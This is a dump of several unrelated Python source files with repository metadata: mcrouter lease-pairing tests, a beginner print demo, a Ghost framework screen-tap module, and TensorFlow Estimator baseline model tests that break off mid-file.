# Definitions of bandit arms
from arms.adversarial import *
from arms.bernoulli import *
from arms.normal import *
# Definitions of bandit algorithms
from algorithms.epsilon_greedy.standard import *
from algorithms.epsilon_greedy.annealing import *
from algorithms.softmax.standard import *
from algorithms.softmax.annealing import *
from algorithms.ucb.ucb1 import *
from algorithms.ucb.ucb2 import *
from algorithms.exp3.exp3 import *
from algorithms.hedge.hedge import *
# # Testing framework
from testing_framework.tests import *
| 25.269231 | 49 | 0.794521 |
4a2267cae487b86e6e79031b848458e4d278e6e6 | 2,655 | py | Python | third-party/mcrouter/src/mcrouter/test/test_lease_pairing.py | hkirsman/hhvm_centos7_builds | 2a1fd6de0d2d289c1575f43f10018f3bec23bb13 | [
"PHP-3.01",
"Zend-2.0"
] | 4 | 2015-10-02T13:45:18.000Z | 2020-07-31T13:01:34.000Z | third-party/mcrouter/src/mcrouter/test/test_lease_pairing.py | hkirsman/hhvm_centos7_builds | 2a1fd6de0d2d289c1575f43f10018f3bec23bb13 | [
"PHP-3.01",
"Zend-2.0"
] | 3 | 2015-11-19T07:34:27.000Z | 2016-07-28T23:25:45.000Z | third-party/mcrouter/src/mcrouter/test/test_lease_pairing.py | hkirsman/hhvm_centos7_builds | 2a1fd6de0d2d289c1575f43f10018f3bec23bb13 | [
"PHP-3.01",
"Zend-2.0"
] | 8 | 2015-10-24T00:07:59.000Z | 2021-04-08T10:58:30.000Z | # Copyright (c) 2015, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from mcrouter.test.MCProcess import Memcached, McrouterClients
from mcrouter.test.McrouterTestCase import McrouterTestCase
class TestLeasePairing(McrouterTestCase):
config = './mcrouter/test/test_lease_pairing.json'
def create_mcrouter(self, extra_args=[]):
extra_args += ['--proxy-threads', '2']
self.memcached1 = self.add_server(Memcached())
self.memcached2 = self.add_server(Memcached())
self.mcrouter = self.add_mcrouter(self.config,
extra_args=extra_args)
self.clients = McrouterClients(self.mcrouter.port, 2)
def test_lease_pairing_enabled(self):
# The lease-get and it's corresponding lease-set
# should go to the same server.
self.create_mcrouter(extra_args=['--enable-lease-pairing'])
# kill memcached1
self.memcached1.pause()
# lease get - should go to memcache2
get_reply = self.clients[0].leaseGet("key")
self.assertTrue(get_reply is not None)
# bring memcached1 up
self.memcached1.resume()
# lease set should go to the same server as lease get - memcache2
set_reply = self.clients[1].leaseSet("key",
{"value": "abc", "token": get_reply['token']})
self.assertTrue(set_reply is not None)
self.assertTrue(self.memcached1.get("key") is None)
self.assertTrue(self.memcached2.get("key") is not None)
def test_lease_pairing_disabled(self):
# The lease-get and it's corresponding lease-set
# should go to the same server.
self.create_mcrouter()
# kill memcached1
self.memcached1.pause()
# lease get - should go to memcache2
get_reply = self.clients[0].leaseGet("key")
self.assertTrue(get_reply is not None)
# bring memcached1 up
self.memcached1.resume()
# lease set should go to memcache1
set_reply = self.clients[1].leaseSet("key",
{"value": "abc", "token": get_reply['token']})
self.assertTrue(set_reply is not None)
self.assertTrue(self.memcached1.get("key") is not None)
self.assertTrue(self.memcached2.get("key") is None)
| 36.369863 | 77 | 0.666667 |
4a2267ecc091949cd34ae5cd72f472d52faa414e | 763 | py | Python | src/com/python/demo/helloPython.py | Leeo1124/pythonDemo | 72e2209c095301a3f1f61edfe03ea69c3c05be40 | [
"Apache-2.0"
] | null | null | null | src/com/python/demo/helloPython.py | Leeo1124/pythonDemo | 72e2209c095301a3f1f61edfe03ea69c3c05be40 | [
"Apache-2.0"
] | null | null | null | src/com/python/demo/helloPython.py | Leeo1124/pythonDemo | 72e2209c095301a3f1f61edfe03ea69c3c05be40 | [
"Apache-2.0"
] | null | null | null | #输出
print('hello python!')
print(100 + 200 + 300)
print('100 + 200 =', 100 + 200)
print("adfa")
print('The quick brown fox', 'jumps over', 'the lazy dog')
#输入
#name = input('please enter your name: ')
#print('hello',name)
#用r''表示''内部的字符串默认不转义
print(r'\\\t\\')
#用'''...'''的格式表示多行内容
print('''line1
line2
line3''')
print(r'''\\\t\\line1
line2
line3''')
print(True and True)
print(True or True)
print(not True)
print(10 / 3)
print(10 // 3)
print(ord('A'))
print(ord('中'))
print(chr(66))
print(chr(25991))
#bytes类型的数据用带b前缀的单引号或双引号表示
print('ABC'.encode('ascii'))
print(b'ABC'.decode('ascii'))
#len()函数计算的是str的字符数,如果换成bytes,len()函数就计算字节数
print(len('中文'))
print(len(b'ABC'))
print(len('中文'.encode('utf-8')))
print('Hi, %s, you have $%d.' % ('Michael', 1000000)) | 16.955556 | 58 | 0.639581 |
4a2268d7e47266c1c75147e12ce9280313ad0ac6 | 1,730 | py | Python | modules/click.py | justdanofficial/Ghost | a95f166a6bb706a39fb0f2f5689a364bca47e78b | [
"MIT"
] | 1 | 2021-06-20T23:43:25.000Z | 2021-06-20T23:43:25.000Z | modules/click.py | justdanofficial/Ghost | a95f166a6bb706a39fb0f2f5689a364bca47e78b | [
"MIT"
] | null | null | null | modules/click.py | justdanofficial/Ghost | a95f166a6bb706a39fb0f2f5689a364bca47e78b | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
#
# MIT License
#
# Copyright (c) 2020 EntySec
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
from core.badges import Badges
class GhostModule:
def __init__(self, ghost):
self.ghost = ghost
self.badges = Badges()
self.details = {
'name': "click",
'authors': ['jaxparrow07'],
'description': "Clicks the specified x and y axis.",
'usage': "click <x> <y>",
'type': "managing",
'args': 2,
'needs_args': True,
'needs_root': False,
'comments': ""
}
def run(self, args):
self.ghost.send_command("shell", "\"input tap " + args + "\"", True)
| 35.306122 | 80 | 0.672254 |
4a22690f71f3c3746f35f7c9dd5681070c9875ce | 54,761 | py | Python | tensorflow_estimator/python/estimator/canned/baseline_test.py | tirkarthi/estimator | 5d962124f1c2ad5b2886ada53d5c604257b660b6 | [
"Apache-2.0"
] | null | null | null | tensorflow_estimator/python/estimator/canned/baseline_test.py | tirkarthi/estimator | 5d962124f1c2ad5b2886ada53d5c604257b660b6 | [
"Apache-2.0"
] | null | null | null | tensorflow_estimator/python/estimator/canned/baseline_test.py | tirkarthi/estimator | 5d962124f1c2ad5b2886ada53d5c604257b660b6 | [
"Apache-2.0"
] | null | null | null | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for baseline.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
import os
import shutil
import tempfile
import tensorflow as tf
import numpy as np
import six
from tensorflow.core.example import example_pb2
from tensorflow.core.example import feature_pb2
from tensorflow.python.client import session as tf_session
from tensorflow.python.feature_column import feature_column_v2 as feature_column_lib
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.keras.optimizer_v2 import optimizer_v2
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import parsing_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import gfile
from tensorflow.python.platform import test
from tensorflow.python.summary.writer import writer_cache
from tensorflow.python.training import checkpoint_utils
from tensorflow.python.training import input as input_lib
from tensorflow.python.training import queue_runner
from tensorflow.python.training import saver
from tensorflow_estimator.python.estimator.canned import baseline
from tensorflow_estimator.python.estimator.canned import metric_keys
from tensorflow_estimator.python.estimator.export import export
from tensorflow_estimator.python.estimator.inputs import numpy_io
from tensorflow_estimator.python.estimator.inputs import pandas_io
try:
# pylint: disable=g-import-not-at-top
import pandas as pd
HAS_PANDAS = True
except IOError:
# Pandas writes a temporary file during import. If it fails, don't use pandas.
HAS_PANDAS = False
except ImportError:
HAS_PANDAS = False
# pylint rules which are disabled by default for test files.
# pylint: disable=invalid-name,protected-access,missing-docstring
# Names of variables created by model.
BIAS_NAME = 'baseline/bias'
def assert_close(expected, actual, rtol=1e-04, name='assert_close'):
with ops.name_scope(name, 'assert_close', (expected, actual, rtol)) as scope:
expected = ops.convert_to_tensor(expected, name='expected')
actual = ops.convert_to_tensor(actual, name='actual')
rdiff = tf.math.abs(expected - actual, 'diff') / tf.math.abs(expected)
rtol = ops.convert_to_tensor(rtol, name='rtol')
return tf.compat.v1.debugging.assert_less(
rdiff,
rtol,
data=('Condition expected =~ actual did not hold element-wise:'
'expected = ', expected, 'actual = ', actual, 'rdiff = ', rdiff,
'rtol = ', rtol,),
name=scope)
def save_variables_to_ckpt(model_dir):
init_all_op = [tf.compat.v1.initializers.global_variables()]
with tf.compat.v1.Session() as sess:
sess.run(init_all_op)
tf.compat.v1.train.Saver().save(sess, os.path.join(model_dir, 'model.ckpt'))
def queue_parsed_features(feature_map):
tensors_to_enqueue = []
keys = []
for key, tensor in six.iteritems(feature_map):
keys.append(key)
tensors_to_enqueue.append(tensor)
queue_dtypes = [x.dtype for x in tensors_to_enqueue]
input_queue = tf.queue.FIFOQueue(capacity=100, dtypes=queue_dtypes)
tf.compat.v1.train.queue_runner.add_queue_runner(
tf.compat.v1.train.queue_runner.QueueRunner(input_queue,
[input_queue.enqueue(tensors_to_enqueue)]))
dequeued_tensors = input_queue.dequeue()
return {keys[i]: dequeued_tensors[i] for i in range(len(dequeued_tensors))}
def sorted_key_dict(unsorted_dict):
return {k: unsorted_dict[k] for k in sorted(unsorted_dict)}
def sigmoid(x):
return 1 / (1 + np.exp(-1.0 * x))
def _baseline_regressor_fn(*args, **kwargs):
return baseline.BaselineRegressorV2(*args, **kwargs)
def _baseline_classifier_fn(*args, **kwargs):
return baseline.BaselineClassifierV2(*args, **kwargs)
def mock_optimizer_v2(testcase, expected_loss=None):
"""Creates a mock optimizer to test the train method.
Args:
testcase: A TestCase instance.
expected_loss: If given, will assert the loss value.
Returns:
A mock Optimizer.
"""
expected_var_names = ['%s:0' % BIAS_NAME]
class _Optimizer(optimizer_v2.OptimizerV2):
def get_updates(self, loss, params):
trainable_vars = params
testcase.assertItemsEqual(expected_var_names,
[var.name for var in trainable_vars])
# Verify loss. We can't check the value directly, so we add an assert op.
testcase.assertEquals(0, loss.shape.ndims)
if expected_loss is None:
if self.iterations is not None:
return [self.iterations.assign_add(1).op]
return [tf.no_op()]
assert_loss = assert_close(
tf.cast(expected_loss, name='expected', dtype=tf.dtypes.float32),
loss,
name='assert_loss')
with tf.control_dependencies((assert_loss,)):
if self.iterations is not None:
return [self.iterations.assign_add(1).op]
return [tf.no_op()]
def get_config(self):
config = super(_Optimizer, self).get_config()
return config
optimizer = _Optimizer(name='my_optimizer')
return optimizer
# Tests for Baseline Regressor.
# TODO(b/36813849): Add tests with dynamic shape inputs using placeholders.
class BaselineRegressorEvaluationTest(tf.test.TestCase):
def setUp(self):
self._model_dir = tempfile.mkdtemp()
def tearDown(self):
if self._model_dir:
tf.compat.v1.summary.FileWriterCache.clear()
shutil.rmtree(self._model_dir)
def test_evaluation_for_simple_data(self):
with tf.Graph().as_default():
tf.Variable([13.0], name=BIAS_NAME)
tf.Variable(
100, name=tf.compat.v1.GraphKeys.GLOBAL_STEP, dtype=tf.dtypes.int64)
save_variables_to_ckpt(self._model_dir)
baseline_regressor = _baseline_regressor_fn(model_dir=self._model_dir)
eval_metrics = baseline_regressor.evaluate(
input_fn=lambda: ({'age': ((1,),)}, ((10.,),)), steps=1)
# Logit is bias = 13, while label is 10. Loss is 3**2 = 9.
self.assertDictEqual({
metric_keys.MetricKeys.LOSS: 9.,
metric_keys.MetricKeys.LOSS_MEAN: 9.,
metric_keys.MetricKeys.PREDICTION_MEAN: 13.,
metric_keys.MetricKeys.LABEL_MEAN: 10.,
tf.compat.v1.GraphKeys.GLOBAL_STEP: 100
}, eval_metrics)
def test_evaluation_batch(self):
"""Tests evaluation for batch_size==2."""
with tf.Graph().as_default():
tf.Variable([13.0], name=BIAS_NAME)
tf.Variable(
100, name=tf.compat.v1.GraphKeys.GLOBAL_STEP, dtype=tf.dtypes.int64)
save_variables_to_ckpt(self._model_dir)
baseline_regressor = _baseline_regressor_fn(model_dir=self._model_dir)
eval_metrics = baseline_regressor.evaluate(
input_fn=lambda: ({'age': ((1,), (1,))}, ((10.,), (10.,))), steps=1)
# Logit is bias = 13, while label is 10.
# Loss per example is 3**2 = 9.
# Training loss is the sum over batch size = (9 + 9) / 2 = 9
# Average loss is the average over batch = 9
self.assertDictEqual({
metric_keys.MetricKeys.LOSS: 9.,
metric_keys.MetricKeys.LOSS_MEAN: 9.,
metric_keys.MetricKeys.PREDICTION_MEAN: 13.,
metric_keys.MetricKeys.LABEL_MEAN: 10.,
tf.compat.v1.GraphKeys.GLOBAL_STEP: 100
}, eval_metrics)
def test_evaluation_weights(self):
"""Tests evaluation with weights."""
with tf.Graph().as_default():
tf.Variable([13.0], name=BIAS_NAME)
tf.Variable(
100, name=tf.compat.v1.GraphKeys.GLOBAL_STEP, dtype=tf.dtypes.int64)
save_variables_to_ckpt(self._model_dir)
def _input_fn():
features = {'age': ((1,), (1,)), 'weights': ((1.,), (2.,))}
labels = ((10.,), (10.,))
return features, labels
baseline_regressor = _baseline_regressor_fn(
weight_column='weights',
model_dir=self._model_dir)
eval_metrics = baseline_regressor.evaluate(input_fn=_input_fn, steps=1)
# Logit is bias = 13, while label is 10.
# Loss per example is 3**2 = 9.
# Training loss is the weighted sum over batch size = (9 + 2*9) / 2 = 13.5
# average loss is the weighted average = 9 + 2*9 / (1 + 2) = 9
self.assertDictEqual({
metric_keys.MetricKeys.LOSS: 13.5,
metric_keys.MetricKeys.LOSS_MEAN: 9.,
metric_keys.MetricKeys.PREDICTION_MEAN: 13.,
metric_keys.MetricKeys.LABEL_MEAN: 10.,
tf.compat.v1.GraphKeys.GLOBAL_STEP: 100
}, eval_metrics)
def test_evaluation_for_multi_dimensions(self):
label_dim = 2
with tf.Graph().as_default():
tf.Variable([46.0, 58.0], name=BIAS_NAME)
tf.Variable(100, name='global_step', dtype=tf.dtypes.int64)
save_variables_to_ckpt(self._model_dir)
baseline_regressor = _baseline_regressor_fn(
label_dimension=label_dim,
model_dir=self._model_dir)
input_fn = numpy_io.numpy_input_fn(
x={
'age': np.array([[2., 4., 5.]]),
},
y=np.array([[46., 58.]]),
batch_size=1,
num_epochs=None,
shuffle=False)
eval_metrics = baseline_regressor.evaluate(input_fn=input_fn, steps=1)
self.assertItemsEqual(
(metric_keys.MetricKeys.LOSS, metric_keys.MetricKeys.LOSS_MEAN,
metric_keys.MetricKeys.PREDICTION_MEAN,
metric_keys.MetricKeys.LABEL_MEAN, tf.compat.v1.GraphKeys.GLOBAL_STEP),
eval_metrics.keys())
# Logit is bias which is [46, 58]
self.assertAlmostEqual(0, eval_metrics[metric_keys.MetricKeys.LOSS])
class BaselineRegressorPredictTest(tf.test.TestCase):
def setUp(self):
self._model_dir = tempfile.mkdtemp()
def tearDown(self):
if self._model_dir:
tf.compat.v1.summary.FileWriterCache.clear()
shutil.rmtree(self._model_dir)
def test_1d(self):
"""Tests predict when all variables are one-dimensional."""
with tf.Graph().as_default():
tf.Variable([.2], name=BIAS_NAME)
tf.Variable(100, name='global_step', dtype=tf.dtypes.int64)
save_variables_to_ckpt(self._model_dir)
baseline_regressor = _baseline_regressor_fn(model_dir=self._model_dir)
predict_input_fn = numpy_io.numpy_input_fn(
x={'x': np.array([[2.]])},
y=None,
batch_size=1,
num_epochs=1,
shuffle=False)
predictions = baseline_regressor.predict(input_fn=predict_input_fn)
predicted_scores = list([x['predictions'] for x in predictions])
# x * weight + bias = 2. * 10. + .2 = 20.2
self.assertAllClose([[.2]], predicted_scores)
def testMultiDim(self):
"""Tests predict when all variables are multi-dimenstional."""
batch_size = 2
label_dimension = 3
with tf.Graph().as_default():
tf.Variable( # shape=[label_dimension]
[.2, .4, .6], name=BIAS_NAME)
tf.Variable(100, name='global_step', dtype=tf.dtypes.int64)
save_variables_to_ckpt(self._model_dir)
baseline_regressor = _baseline_regressor_fn(
label_dimension=label_dimension,
model_dir=self._model_dir)
predict_input_fn = numpy_io.numpy_input_fn(
# x shape=[batch_size, x_dim]
x={'x': np.array([[1., 2., 3., 4.], [5., 6., 7., 8.]])},
y=None,
batch_size=batch_size,
num_epochs=1,
shuffle=False)
predictions = baseline_regressor.predict(input_fn=predict_input_fn)
predicted_scores = list([x['predictions'] for x in predictions])
# score = bias, shape=[batch_size, label_dimension]
self.assertAllClose([[0.2, 0.4, 0.6], [0.2, 0.4, 0.6]],
predicted_scores)
class BaselineRegressorIntegrationTest(tf.test.TestCase):
def setUp(self):
self._model_dir = tempfile.mkdtemp()
def tearDown(self):
if self._model_dir:
tf.compat.v1.summary.FileWriterCache.clear()
shutil.rmtree(self._model_dir)
def _test_complete_flow(self, train_input_fn, eval_input_fn, predict_input_fn,
input_dimension, label_dimension, prediction_length):
feature_columns = [
tf.feature_column.numeric_column('x', shape=(input_dimension,))
]
est = _baseline_regressor_fn(
label_dimension=label_dimension,
model_dir=self._model_dir)
# TRAIN
# learn y = x
est.train(train_input_fn, steps=200)
# EVALUTE
scores = est.evaluate(eval_input_fn)
self.assertEqual(200, scores[tf.compat.v1.GraphKeys.GLOBAL_STEP])
self.assertIn(metric_keys.MetricKeys.LOSS, six.iterkeys(scores))
# PREDICT
predictions = np.array(
[x['predictions'] for x in est.predict(predict_input_fn)])
self.assertAllEqual((prediction_length, label_dimension), predictions.shape)
# EXPORT
feature_spec = tf.feature_column.make_parse_example_spec(
feature_columns)
serving_input_receiver_fn = export.build_parsing_serving_input_receiver_fn(
feature_spec)
export_dir = est.export_saved_model(tempfile.mkdtemp(),
serving_input_receiver_fn)
self.assertTrue(tf.compat.v1.gfile.Exists(export_dir))
def test_numpy_input_fn(self):
"""Tests complete flow with numpy_input_fn."""
label_dimension = 2
input_dimension = label_dimension
batch_size = 10
prediction_length = batch_size
data = np.linspace(0., 2., batch_size * label_dimension, dtype=np.float32)
data = data.reshape(batch_size, label_dimension)
train_input_fn = numpy_io.numpy_input_fn(
x={'x': data},
y=data,
batch_size=batch_size,
num_epochs=None,
shuffle=True)
eval_input_fn = numpy_io.numpy_input_fn(
x={'x': data},
y=data,
batch_size=batch_size,
num_epochs=1,
shuffle=False)
predict_input_fn = numpy_io.numpy_input_fn(
x={'x': data},
y=None,
batch_size=batch_size,
num_epochs=1,
shuffle=False)
self._test_complete_flow(
train_input_fn=train_input_fn,
eval_input_fn=eval_input_fn,
predict_input_fn=predict_input_fn,
input_dimension=input_dimension,
label_dimension=label_dimension,
prediction_length=prediction_length)
def test_pandas_input_fn(self):
"""Tests complete flow with pandas_input_fn."""
if not HAS_PANDAS:
return
# Pandas DataFrame natually supports 1 dim data only.
label_dimension = 1
input_dimension = label_dimension
batch_size = 10
data = np.array([1., 2., 3., 4.], dtype=np.float32)
x = pd.DataFrame({'x': data})
y = pd.Series(data)
prediction_length = 4
train_input_fn = pandas_io.pandas_input_fn(
x=x, y=y, batch_size=batch_size, num_epochs=None, shuffle=True)
eval_input_fn = pandas_io.pandas_input_fn(
x=x, y=y, batch_size=batch_size, shuffle=False)
predict_input_fn = pandas_io.pandas_input_fn(
x=x, batch_size=batch_size, shuffle=False)
self._test_complete_flow(
train_input_fn=train_input_fn,
eval_input_fn=eval_input_fn,
predict_input_fn=predict_input_fn,
input_dimension=input_dimension,
label_dimension=label_dimension,
prediction_length=prediction_length)
def test_input_fn_from_parse_example(self):
"""Tests complete flow with input_fn constructed from parse_example."""
label_dimension = 2
input_dimension = label_dimension
batch_size = 10
prediction_length = batch_size
data = np.linspace(0., 2., batch_size * label_dimension, dtype=np.float32)
data = data.reshape(batch_size, label_dimension)
serialized_examples = []
for datum in data:
example = example_pb2.Example(features=feature_pb2.Features(
feature={
'x':
feature_pb2.Feature(float_list=feature_pb2.FloatList(
value=datum)),
'y':
feature_pb2.Feature(float_list=feature_pb2.FloatList(
value=datum[:label_dimension])),
}))
serialized_examples.append(example.SerializeToString())
feature_spec = {
'x': tf.io.FixedLenFeature([input_dimension], tf.dtypes.float32),
'y': tf.io.FixedLenFeature([label_dimension], tf.dtypes.float32),
}
def _train_input_fn():
feature_map = tf.compat.v1.io.parse_example(serialized_examples, feature_spec)
features = queue_parsed_features(feature_map)
labels = features.pop('y')
return features, labels
def _eval_input_fn():
feature_map = tf.compat.v1.io.parse_example(
tf.compat.v1.train.limit_epochs(serialized_examples, num_epochs=1),
feature_spec)
features = queue_parsed_features(feature_map)
labels = features.pop('y')
return features, labels
def _predict_input_fn():
feature_map = tf.compat.v1.io.parse_example(
tf.compat.v1.train.limit_epochs(serialized_examples, num_epochs=1),
feature_spec)
features = queue_parsed_features(feature_map)
features.pop('y')
return features, None
self._test_complete_flow(
train_input_fn=_train_input_fn,
eval_input_fn=_eval_input_fn,
predict_input_fn=_predict_input_fn,
input_dimension=input_dimension,
label_dimension=label_dimension,
prediction_length=prediction_length)
class BaselineRegressorTrainingTest(tf.test.TestCase):
def setUp(self):
self._model_dir = tempfile.mkdtemp()
def tearDown(self):
if self._model_dir:
tf.compat.v1.summary.FileWriterCache.clear()
shutil.rmtree(self._model_dir)
def _assert_checkpoint(self,
label_dimension,
expected_global_step,
expected_bias=None):
shapes = {
name: shape
for (name, shape) in tf.train.list_variables(self._model_dir)
}
self.assertEqual([], shapes[tf.compat.v1.GraphKeys.GLOBAL_STEP])
self.assertEqual(expected_global_step,
tf.train.load_variable(self._model_dir,
tf.compat.v1.GraphKeys.GLOBAL_STEP))
self.assertEqual([label_dimension], shapes[BIAS_NAME])
if expected_bias is not None:
self.assertEqual(expected_bias,
tf.train.load_variable(self._model_dir,
BIAS_NAME))
def testFromScratchWithDefaultOptimizer(self):
# Create BaselineRegressor.
label = 5.
age = 17
baseline_regressor = _baseline_regressor_fn(model_dir=self._model_dir)
# Train for a few steps, and validate final checkpoint.
num_steps = 10
baseline_regressor.train(
input_fn=lambda: ({'age': ((age,),)}, ((label,),)), steps=num_steps)
self._assert_checkpoint(label_dimension=1, expected_global_step=num_steps)
def testTrainWithOneDimLabel(self):
label_dimension = 1
batch_size = 20
est = _baseline_regressor_fn(
label_dimension=label_dimension,
model_dir=self._model_dir)
data_rank_1 = np.linspace(0., 2., batch_size, dtype=np.float32)
self.assertEqual((batch_size,), data_rank_1.shape)
train_input_fn = numpy_io.numpy_input_fn(
x={'age': data_rank_1},
y=data_rank_1,
batch_size=batch_size,
num_epochs=None,
shuffle=True)
est.train(train_input_fn, steps=200)
self._assert_checkpoint(label_dimension=1, expected_global_step=200)
def testTrainWithOneDimWeight(self):
label_dimension = 1
batch_size = 20
est = _baseline_regressor_fn(
label_dimension=label_dimension,
weight_column='w',
model_dir=self._model_dir)
data_rank_1 = np.linspace(0., 2., batch_size, dtype=np.float32)
self.assertEqual((batch_size,), data_rank_1.shape)
train_input_fn = numpy_io.numpy_input_fn(
x={'age': data_rank_1,
'w': data_rank_1},
y=data_rank_1,
batch_size=batch_size,
num_epochs=None,
shuffle=True)
est.train(train_input_fn, steps=200)
self._assert_checkpoint(label_dimension=1, expected_global_step=200)
def testFromScratch(self):
# Create BaselineRegressor.
label = 5.
age = 17
# loss = (logits - label)^2 = (0 - 5.)^2 = 25.
mock_optimizer = mock_optimizer_v2(self, expected_loss=25.)
baseline_regressor = _baseline_regressor_fn(
model_dir=self._model_dir,
optimizer=mock_optimizer)
# Train for a few steps, and validate optimizer and final checkpoint.
num_steps = 10
baseline_regressor.train(
input_fn=lambda: ({'age': ((age,),)}, ((label,),)), steps=num_steps)
self.assertEqual(
num_steps,
baseline_regressor.get_variable_value(mock_optimizer.iterations.name))
self._assert_checkpoint(
label_dimension=1,
expected_global_step=num_steps,
expected_bias=[0.])
def testFromCheckpoint(self):
# Create initial checkpoint.
bias = 7.0
initial_global_step = 100
with tf.Graph().as_default():
tf.Variable([bias], name=BIAS_NAME)
tf.Variable(
initial_global_step,
name=tf.compat.v1.GraphKeys.GLOBAL_STEP,
dtype=tf.dtypes.int64)
save_variables_to_ckpt(self._model_dir)
# logits = bias = 6.
# loss = (logits - label)^2 = (7 - 5)^2 = 4
mock_optimizer = mock_optimizer_v2(self, expected_loss=4.)
baseline_regressor = _baseline_regressor_fn(
model_dir=self._model_dir,
optimizer=mock_optimizer)
# Train for a few steps, and validate optimizer and final checkpoint.
num_steps = 10
baseline_regressor.train(
input_fn=lambda: ({'age': ((17,),)}, ((5.,),)), steps=num_steps)
self.assertEqual(
initial_global_step + num_steps,
baseline_regressor.get_variable_value(mock_optimizer.iterations.name))
self._assert_checkpoint(
label_dimension=1,
expected_global_step=initial_global_step + num_steps,
expected_bias=[bias])
def testFromCheckpointMultiBatch(self):
# Create initial checkpoint.
bias = 5.0
initial_global_step = 100
with tf.Graph().as_default():
tf.Variable([bias], name=BIAS_NAME)
tf.Variable(
initial_global_step,
name=tf.compat.v1.GraphKeys.GLOBAL_STEP,
dtype=tf.dtypes.int64)
save_variables_to_ckpt(self._model_dir)
# logits = bias
# logits[0] = 5.
# logits[1] = 5.
# loss = (sum(logits - label)^2 = (5 - 5)^2 + (5 - 3)^2) / 2 (batch size)
# loss = 2
mock_optimizer = mock_optimizer_v2(self, expected_loss=2.)
baseline_regressor = _baseline_regressor_fn(
model_dir=self._model_dir,
optimizer=mock_optimizer)
# Train for a few steps, and validate optimizer and final checkpoint.
num_steps = 10
baseline_regressor.train(
input_fn=lambda: ({'age': ((17,), (15,))}, ((5.,), (3.,))),
steps=num_steps)
self.assertEqual(
initial_global_step + num_steps,
baseline_regressor.get_variable_value(mock_optimizer.iterations.name))
self._assert_checkpoint(
label_dimension=1,
expected_global_step=initial_global_step + num_steps,
expected_bias=bias)
# Tests for Baseline Classifier.
class BaselineClassifierTrainingTest(tf.test.TestCase):
def setUp(self):
self._model_dir = tempfile.mkdtemp()
def tearDown(self):
if self._model_dir:
shutil.rmtree(self._model_dir)
def _assert_checkpoint(
self, n_classes, expected_global_step, expected_bias=None):
logits_dimension = n_classes if n_classes > 2 else 1
shapes = {
name: shape for (name, shape) in
tf.train.list_variables(self._model_dir)
}
self.assertEqual([], shapes[tf.compat.v1.GraphKeys.GLOBAL_STEP])
self.assertEqual(
expected_global_step,
tf.train.load_variable(
self._model_dir, tf.compat.v1.GraphKeys.GLOBAL_STEP))
self.assertEqual([logits_dimension], shapes[BIAS_NAME])
if expected_bias is not None:
self.assertAllEqual(expected_bias,
tf.train.load_variable(
self._model_dir, BIAS_NAME))
def _testFromScratchWithDefaultOptimizer(self, n_classes):
label = 0
age = 17
est = baseline.BaselineClassifierV2(
n_classes=n_classes, model_dir=self._model_dir)
# Train for a few steps, and validate final checkpoint.
num_steps = 10
est.train(
input_fn=lambda: ({'age': ((age,),)}, ((label,),)), steps=num_steps)
self._assert_checkpoint(n_classes, num_steps)
def testBinaryClassesFromScratchWithDefaultOptimizer(self):
self._testFromScratchWithDefaultOptimizer(n_classes=2)
def testMultiClassesFromScratchWithDefaultOptimizer(self):
self._testFromScratchWithDefaultOptimizer(n_classes=4)
def _testTrainWithTwoDimsLabel(self, n_classes):
batch_size = 20
est = baseline.BaselineClassifierV2(
n_classes=n_classes, model_dir=self._model_dir)
data_rank_1 = np.array([0, 1])
data_rank_2 = np.array([[0], [1]])
self.assertEqual((2,), data_rank_1.shape)
self.assertEqual((2, 1), data_rank_2.shape)
train_input_fn = numpy_io.numpy_input_fn(
x={'age': data_rank_1},
y=data_rank_2,
batch_size=batch_size,
num_epochs=None,
shuffle=True)
est.train(train_input_fn, steps=200)
self._assert_checkpoint(n_classes, 200)
def testBinaryClassesTrainWithTwoDimsLabel(self):
self._testTrainWithTwoDimsLabel(n_classes=2)
def testMultiClassesTrainWithTwoDimsLabel(self):
self._testTrainWithTwoDimsLabel(n_classes=4)
def _testTrainWithOneDimLabel(self, n_classes):
batch_size = 20
est = baseline.BaselineClassifierV2(
n_classes=n_classes, model_dir=self._model_dir)
data_rank_1 = np.array([0, 1])
self.assertEqual((2,), data_rank_1.shape)
train_input_fn = numpy_io.numpy_input_fn(
x={'age': data_rank_1},
y=data_rank_1,
batch_size=batch_size,
num_epochs=None,
shuffle=True)
est.train(train_input_fn, steps=200)
self._assert_checkpoint(n_classes, 200)
def testBinaryClassesTrainWithOneDimLabel(self):
self._testTrainWithOneDimLabel(n_classes=2)
def testMultiClassesTrainWithOneDimLabel(self):
